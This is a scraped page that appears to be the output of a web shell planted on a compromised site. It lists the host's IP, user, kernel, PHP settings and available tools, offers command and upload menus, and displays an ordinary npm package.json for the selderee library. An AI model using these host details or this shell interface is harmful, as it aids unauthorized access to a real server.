Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/selderee/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
{ "name": "selderee", "version": "0.10.0", "description": "Selectors decision tree - choose matching selectors, fast", "keywords": [ "CSS", "selectors", "decision tree", "match" ], "repository": { "type": "git", "url": "git+https://github.com/mxxii/selderee.git" }, "bugs": { "url": "https://github.com/mxxii/selderee/issues" }, "homepage": "https://github.com/mxxii/selderee", "author": "KillyMXI", "funding": "https://ko-fi.com/killymxi", "license": "MIT", "exports": { "import": "./lib/selderee.mjs", "require": "./lib/selderee.cjs" }, "type": "module", "main": "./lib/selderee.cjs", "module": "./lib/selderee.mjs", "types": "./lib/selderee.d.ts", "typedocMain": "./src/selderee.ts", "files": [ "lib" ], "sideEffects": false, "scripts": { "build:rollup": "rollup -c", "build:types": "tsc -d --emitDeclarationOnly --declarationDir ./lib", "build": "npm run clean && npm run build:rollup && npm run build:types", "clean": "rimraf lib" }, "dependencies": { "parseley": "^0.11.0" } }